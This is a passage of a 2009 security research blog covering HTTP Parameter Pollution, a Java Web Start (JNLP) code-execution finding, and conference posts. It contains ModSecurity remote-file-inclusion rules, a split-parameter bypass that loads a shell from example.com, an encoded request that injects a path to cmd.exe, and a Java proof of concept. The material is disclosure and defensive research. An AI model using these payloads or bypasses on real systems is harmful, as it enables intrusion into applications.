      SecRule “ARGS” “@rx \binclude\s*\([^)]*(ht|f)tps?://”
      “t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’RFI’ “

      Inclusion ends with question mark
      SecRule “ARGS” “@rx (ft|htt)ps?.*\?+$”
      “t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’RFI’ “

      In case of ASP and ASP.NET (and other HTTP back-ends), it is still possible to inject multiple HTTP parameters containing two segments of the attack:

      http://vulnerable_app/vulnerable_page?par=http://example.com/shell.txt&par=?

      Resulting in "http://example.com/shell.txt,?". Since the pseudo shell filename is managed by the attacker, he/she may easily create a file named "shell.txt,". The following attack bypasses the other two rules as well.

      Obviously, this is true for all different web technologies that consider multiple occurrences and concatenate those using different chars. ASP and ASP.NET are the most interesting examples of such behavior. Indeed, I understand that the suggested solution may provide a workable level of security, especially considering that PHP does not concatenate multiple parameters.

      Besides WAFs stuff, it is important to remember that HPP is also about server and client side flaws. Well, in case it's not clear enough, some vulnerabilities that we are going to disclose will hopefully help to emphasize the concept.

      Luca
      Tags: ikki hpp

      May 31 2009

      09:04

      IT Underground and TomcatZOO

      Finally, it is my turn! I really enjoy the idea of sharing my thoughts here.

      Since NibbleSec is a multi-author blog, I'm not going to bore you with low-level stuff - Snagg is just enough!

      For fun (and profit) I'm usually involved in web application pentests and lately in Java security. It is a kind of fun and this is usually the easiest way to get a shell in these days.

      I'm just back after IT Underground Prague where I gave a speech about Apache Tomcat security and TomcatZOO, one of the first NibbleSec project. While waiting for the release of the tool, you may enjoy the presentation.

      Ikki
      Tags: ikki tomcat
      09:04

      Client side code execution via JNLP files

      As you may know, I'm a kind of Java enthusiast. This is especially true when a Java technology overlaps with web security.
      I was actually testing a software based on Java Web Start when I've realized how practical (and dangerous) may be this technology. The overall idea of Java Web Start is to deploy and execute Java standalone client, directly from the Internet using a web browser. Unlike Java Applets, Web Start applications do not have all the limitations enforced by the sandbox.

      Specifically I was testing Eye of the Storm, a network management software composed by several server side components as well as a nice Web Start application. A CGI program /EOS/cgi/EYELauncher generates personalized JNLP files so that Java Web Start can invoke a standalone Java application with the proper parameters and configuration.
      Besides other usual issues, I've discovered a way to trigger client side code execution via a tampered JNLP file. Thinking about a real-world attack scenario, an aggressor could convince a user to follow a malicious link which abuse the online CGI in order to generate malicious JNLP files. Since the CGI does not properly filter the input, it is possible to pollute the JNLP file content.

      A simple GET request, as the following
      http:///EOS/cgi/EYELauncher?%2d%2d%75%73%65%72%3d%61%61%61%3b%2d%2d%68%6f%73%74%3d%61%61%61%3b%2d%2d%68%74%74%70 %50%72%6f%74%6f%63%6f%6c%3d%66%69%6c%65%3a%2f%2f%2f%43%3a%5c%5c%57%49%4e%4e%54%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63 %6d%64%2e%65%78%65%3f
      will cause the inclusion of user-supplied parameters in com.entuity.eos.client.startup.EYELauncher.main(String args[]).

      In particular circumstances, the application may invoke the executeEYEClient(String, String, String, String, String) method, which can be used to exploit a vulnerable com.entuity.util.BrowserLauncher.openURL(String) method executing the well-known Runtime.getRuntime().exec()call.
      The execution of the vulnerable method is triggered by an exception while the Main method runs. EYELauncher handles this specific exception by requesting a new JNLP file from the server, using the insecure "openURL" call.

      To locally test the vulnerability, just use the following code:
      import com.entuity.eos.client.startup.EYELauncher;

      public class EOTS_poc1 {
      public static void main(String[] args) {
      String arguments[]={"--user=aaa","--host=aaa","--httpProtocol=file:///C:\\WINNT\\system32\\cmd.exe?"};
      EYELauncher.main(arguments);
      }}
      Unfortunately, I was not able to find a reliable way to trigger the exception, thus the exploitability of this finding is likely low. However, at least in my humble opinion, it is a nice demonstration of one-click code execution.

      In addition to the usual stuff (XSS, ActiveX exploits and so on), let's not forget about Java Web Start as well.
      Tags: ikki java
      09:03

      HTTP Parameter Pollution FAQs

      We have received numerous public replies as well as several private emails.
      Thanks for your comments, suggestions and feedbacks.

      It's now time to summarize and clarify some points.

      Q: Is this a new class of exploits or just another case of applications lacking input validation?
      A: Actually, HPP is an input validation flaw. As SQL Injection and XSS, we may consider it as an injection weakness. In this specific case, query string delimiters are the "dangerous" characters.

      Q: You are saying that several HTTP back-ends manage multiple occurrences in different ways. In some cases, it may be abused in order to fingerprint the underline back-end. Is it right?
      A: Yes, sure. However, considering the granularity available, we don't think it is really so interesting.

      Q: This is a known attack. You guys presented a bunch of interesting but already known techniques to exploit different vulnerabilities.
      A: Actually, we think we have contributed (in some way) to the current state-of-art showing this issue. However, even if it is currently used by "hardcore" attackers, it's very important to formalize a threat in order to mitigate the issue and create efficient workarounds. The aim of the entire research is to raise awareness around this problem. In future, we would like to include HPP within the OWASP Testing Guide in order to provide the right methodology for testing systems against HPP-like attacks as well. We strongly believe that sharing such knowledge may increase the security of all web applications.

      Q: Most of your examples and findings use GET parameters. What about POST?
      A: POST and COOKIE parameters may be affected as well. In slide #11 and #19, we have briefly stated that and you will see further research because it is a very interesting aspect since it gives additional flexibility for all attacks.

      Q: In the current version of IE8, is the XSS Filter still vulnerable to HPP?
      A: No! We had a discussion with the IE XSS Filter guy at Microsoft and turns out that the current version is NOT affected. All previous tests were done against the beta release and we didn't double check the latest one. We are sorry for this misunderstanding.

      Q: Are multiple occurrences of a parameter valid according to the RFC, W3C, whatever?
      A: Yes! Yes! The only thing which in fact was worth mentioning is the lack of standard in the management of multiple occurrences and NOT the presence of multiple occurrences themselves. After all, that's why it is possible to abuse the query string delimiters injection flaw.

      Q: Is Yahoo! Mail still vulnerable to HPP?
      A: Difficult to say. However, the specific issue was patched thus it cannot be abused by malicious users.

      Q: Could you provide additional details regarding the Yahoo! Classic Mail HPP attack?
      A: We've just published HERE an in-depth review of the issue with the video PoC as well.

      Q: What's the right way of managing multiple occurrences? Is there a "perfect" framework?
      A: No, there are no right o wrong behaviors as well as we cannot refer to a right or wrong web servers/web frameworks. The behavior of the HTTP back-ends is a matter of exploitability only.

      Q: HPP is only about WAFs bypasses?
      A: Absolutely not! HPP is also about applications flow manipulation, anti-CSRF, content pollution.

      Q: How can I prevent HPP?
      A: First of all, answer yourself "Which layer am I protecting?". Then, speaking about HPP server side, it's always important to use URL encoding whenever you do GET/POST HTTP requests to an HTTP back-end. From the client-side point of view, use URL encoding whenever you are going to include user-supplied content within links, etc.

      Q: Am I vulnerable to HPP?
      A: It depends on how you are managing several occurrences of the same parameter from the application point of view. Using strict input validation checkpoints and the right output filtering (URL encoding), you are likely secure (at least, against HPP).

      That's all, for now.

      Cheers,
      Luca
      Tags: ikki hpp
      08:58

      HTTP Parameter Pollution (HPP)

      As you know, on May 14th @ OWASP AppSec Poland 2009, me and Stefano di Paola have presented a new attack category called HTTP Parameter Pollution (HPP).

      HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters. It affects a building block of all web technologies thus server-side as well as client-side attacks exist.





      Exploiting HPP vulnerabilities, it may be possible to:
      • Override existing hardcoded HTTP parameters
      • Modify the application behaviors
      • Access and, potentially exploit, uncontrollable variables
      • Bypass input validation checkpoints and WAFs rules
      Just to whet your appetite, we can anticipate that by researching real world HPP vulnerabilities, we have discovered issues on some Google Search Appliance front-end scripts, Ask.com, Yahoo! Mail Classic and several other products.

      You can download the slides of the talk here or browse it on Slideshare.

      Also, we'll release a whitepaper in order to clarify all details about HPP.
      As last news, the video of the "Yahoo! Classic Mail" client side HPP exploitation will be available soon on this blog. That's all for now.

      Cheers,
      Ikki
      Tags: ikki hpp owasp
      08:58

      Making OWASP AppSec 2009 virtual


      The most interesting Web App Security conference is here, in Krakow.
      OWASP AppSec 2009 is a great event, indeed. We're having fun, sharing ideas and trying to build the next webapp security, all together. No flags, no commercial slogans.

      If you do not have the chance to attend the conference in these days, you may virtually join us. Seba and the other guys have organized a 360 degree coverage using blogs, Twitter, Flickr, ...

      In few hours, together with Stefano di Paola, we are going to present our research on HTTP Parameter Pollution (HPP). As we like to say, HPP is a quite simple but effective hacking technique. It can be used to modify the behaviors of client-side and server-side applications, to exploit vulnerabilities in uncontrollable variables and even to bypass web application firewalls. As you will see, it’s a kind of unbelievable story. Further details and the slides will be published as soon as possible.

      Cheers,
      Luca
      Tags: ikki hpp owasp
      08:55

      3, 2, 1... In Mission

      Hello Internet,
      this is our first post, so stop wondering "who the hell are these NibbleSec guys".
      We'll start answering a couple of questions.

      • We're not a commercial entity

      • We're not a ub3r3l33t black-hat crew

      • We're not a new initiative the internet really does not need


      NibbleSec is just a label on a team of four friends who live in the Information Security world, and that's it.
      We're going to use this blog as a launchpad for some of our researches, publishing tools and insights. There are plenty of similar blogs around the net, so here's our personal version.

      We have some nice things in the oven, so stay tuned because we're going to serve a couple of hot dishes in a while!

      Oh, we were almost forgetting this one: you might be interested in knowing who's behind NibbleSec.org !?
      No problem, here you are: BlackFire, Daath, Ikki and Snagg.

      See you soon in the next post!
      Older posts are this way If this message doesn't go away, click anywhere on the page to continue loading posts.
      Could not load more posts
      Maybe Soup is currently being updated? I'll try again automatically in a few seconds...
      Just a second, loading more posts...
      You've reached the end.

      Don't be the product, buy the product!

      Schweinderl